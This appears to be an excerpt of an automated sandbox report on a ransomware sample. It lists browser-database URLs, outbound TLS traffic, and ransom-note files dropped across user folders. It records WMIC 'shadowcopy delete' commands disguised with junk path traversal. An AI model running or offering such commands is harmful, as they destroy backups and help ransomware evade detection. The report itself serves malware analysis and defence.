Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.aliexpress.com/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.amazon.ca/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.amazon.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.amazon.com/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.amazon.de/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.amazon.fr/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.avito.ru/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.baidu.com/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.bbc.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.ctrip.com/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.ebay.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.ebay.de/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.google.com/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.google.com/complete/
Source: 4cb4db2a-ee68-4128-8ff4-f04bdc710c24.19.dr, b6281059-34c6-49d8-97c7-24de33b104ab.19.dr, 7e03a685-c52e-4810-b494-0f433b33ac49.19.drString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.ifeng.com/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.iqiyi.com/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.leboncoin.fr/
Source: 3870112724rsegmnoittet-es.sqlite.19.dr, places.sqlite.19.drString found in binary or memory: https://www.mozilla.org
Source: places.sqlite.19.drString found in binary or memory: https://www.mozilla.org#
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.mozilla.org/
Source: favicons.sqlite.19.drString found in binary or memory: https://www.mozilla.org/about/
Source: places.sqlite.19.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: favicons.sqlite.19.drString found in binary or memory: https://www.mozilla.org/contribute/
Source: places.sqlite.19.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: places.sqlite.19.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.msn.com
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.olx.pl/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.reddit.com/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.wykop.pl/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.youtube.com/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://www.zhihu.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 103.253.43.248:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.253.43.248:443 -> 192.168.2.6:49734 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\MUSKjq\MUSK\..\..\Windows\MUSK\MUSK\..\..\system32\MUSK\MUSK\..\..\wbem\MUSK\MUSKj\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HJKnzu\HJKn\..\..\Windows\HJKn\HJKn\..\..\system32\HJKn\HJKn\..\..\wbem\HJKn\HJKnz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\gdzXho\gdzX\..\..\Windows\gdzX\gdzX\..\..\system32\gdzX\gdzX\..\..\wbem\gdzX\gdzXh\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\WUQpVs\WUQp\..\..\Windows\WUQp\WUQp\..\..\system32\WUQp\WUQp\..\..\wbem\WUQp\WUQpV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\WnmQCH\WnmQ\..\..\Windows\WnmQ\WnmQ\..\..\system32\WnmQ\WnmQ\..\..\wbem\WnmQ\WnmQC\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy deleteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\WUQpVs\WUQp\..\..\Windows\WUQp\WUQp\..\..\system32\WUQp\WUQp\..\..\wbem\WUQp\WUQpV\..\..\wmic.exe shadowcopy deleteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\MUSKjq\MUSK\..\..\Windows\MUSK\MUSK\..\..\system32\MUSK\MUSK\..\..\wbem\MUSK\MUSKj\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\gdzXho\gdzX\..\..\Windows\gdzX\gdzX\..\..\system32\gdzX\gdzX\..\..\wbem\gdzX\gdzXh\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HJKnzu\HJKn\..\..\Windows\HJKn\HJKn\..\..\system32\HJKn\HJKn\..\..\wbem\HJKn\HJKnz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\WnmQCH\WnmQ\..\..\Windows\WnmQ\WnmQ\..\..\system32\WnmQ\WnmQ\..\..\wbem\WnmQ\WnmQC\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\appdata\local\temp\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\desktop\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\desktop\efoyfbolxa\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\desktop\ewzcvgnowt\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\desktop\nvwzapqsql\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\desktop\pwccawlgre\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\desktop\suavtzknfl\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\desktop\zggknsukop\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\documents\efoyfbolxa\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\documents\ewzcvgnowt\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\documents\my music\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\documents\my pictures\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\documents\my pictures\camera roll\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\documents\my pictures\saved pictures\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\documents\my videos\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\documents\nvwzapqsql\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\documents\pwccawlgre\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\documents\suavtzknfl\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\users\user\documents\zggknsukop\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\internet explorer\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\internet explorer\quick launch\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\cloudstore\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\network shortcuts\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\printer shortcuts\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\recent\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\sendto\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\start menu\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\start menu\programs\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\start menu\programs\accessibility\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\start menu\programs\system tools\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\start menu\programs\windows powershell\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\appdata\roaming\microsoft\windows\templates\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\cookies\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\desktop\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\documents\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\documents\my music\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\documents\my pictures\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\documents\my videos\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\downloads\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\favorites\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\links\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\onedrive\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\default\saved games\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\.ms-ad\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\3d objects\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\acrobat\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\acrobat\dc\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\acrobat\dc\collab\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\acrobat\dc\forms\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\acrobat\dc\jscache\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\acrobat\dc\security\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\acrobat\dc\security\crlcache\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\acrobat\preflight acrobat continuous\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\crlogs\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\crlogs\crashlogs\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\flash player\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\flash player\nativecache\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\headlights\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\linguistics\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\logtransport2\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\logtransport2cc\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\rttransfer\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\sonar\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\adobe\sonar\sonarcc\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\com.adobe.dunamis\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\com.adobe.dunamis\6d9d9777-7ded-4768-8191-9a707d72b009\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\addins\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\credentials\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\crypto\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\crypto\keys\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\crypto\rsa\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2246122658-3693405117-2476756634-1003\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\excel\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\excel\xlstart\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\internet explorer\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\internet explorer\quick launch\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\internet explorer\userdata\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\internet explorer\userdata\low\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\network\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\network\connections\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\network\connections\pbk\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\network\connections\pbk\_hiddenpbk\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\protect\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\protect\s-1-5-21-2246122658-3693405117-2476756634-1003\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\speech\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\spelling\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\spelling\en-gb\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\systemcertificates\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\systemcertificates\my\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\systemcertificates\my\certificates\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\systemcertificates\my\crls\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\systemcertificates\my\ctls\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\vault\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\accountpictures\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\cloudstore\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\libraries\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\network shortcuts\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\printer shortcuts\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\recent\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\recent\automaticdestinations\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\recent\customdestinations\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\recent items\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\sendto\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\start menu\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\start menu\programs\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\start menu\programs\accessibility\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\start menu\programs\administrative tools\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\start menu\programs\startup\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\start menu\programs\system tools\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\start menu\programs\windows powershell\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\templates\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\themes\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\microsoft\windows\themes\cachedfiles\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\extensions\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\crash reports\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\crash reports\events\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\pending pings\decryptfiles.txtJump to behavior
